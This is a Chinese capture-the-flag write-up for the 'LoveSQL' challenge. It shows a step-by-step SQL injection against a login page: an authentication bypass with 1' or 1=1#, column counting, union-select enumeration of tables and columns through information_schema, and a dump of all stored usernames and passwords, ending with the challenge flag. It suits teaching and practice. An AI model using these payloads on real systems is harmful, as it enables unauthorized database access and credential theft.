[极客大挑战 2019]LoveSQL 1

测试是否有单引号注入

1'

回显为：

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'password'' at line 1

万能钥匙

1' or 1=1#

回显：

Your password is'22ec72d47e489fbbdf39acd7a87f99ac'

测试字段数

admin' order by 4#

回显：

Unknown column '4' in 'order clause'

说明有四个字段，猜测为：id、username、password

测试回显字段

1' union select 1,2,3#

回显：

Hello 2！
Your password is '3'

可以看到2、3有回显，2代表用户名，3为密码

接下来就可以利用2、3的回显进行注入

测试表

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#

回显:

Hello 2！
Your password is 'geekuser,l0ve1ysq1'

可以看到有geekuser，l0ve1ysq1两个表

查看表的字段

geekuser表

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='geekuser'#

回显：

Hello 2！
Your password is 'id,username,password'

l0ve1ysq1表

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'#

回显：

Hello 2！
Your password is 'id,username,password'

查表

geekuser

1' union select 1,2,group_concat(id,username,password) from geekuser#

回显：

Hello 2！
Your password is '1adminef4087e987fdee056a7d7eb6f611d235'

l0ve1ysq1

1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1#

回显：

Your password is '1cl4ywo_tai_nan_le,2glzjinglzjin_wants_a_girlfriend,3Z4cHAr7zCrbiao_ge_dddd_hm,40xC4m3llinux_chuang_shi_ren,5Ayraina_rua_rain,6Akkoyan_shi_fu_de_mao_bo_he,7fouc5cl4y,8fouc5di_2_kuai_fu_ji,9fouc5di_3_kuai_fu_ji,10fouc5di_4_kuai_fu_ji,11fouc5di_5_kuai_fu_ji,12fouc5di_6_kuai_fu_ji,13fouc5di_7_kuai_fu_ji,14fouc5di_8_kuai_fu_ji,15leixiaoSyc_san_da_hacker,16flagflag{ac289490-df8d-4a2c-a934-e56fbcd2d8c2}'

得到flag

flag{ac289490-df8d-4a2c-a934-e56fbcd2d8c2}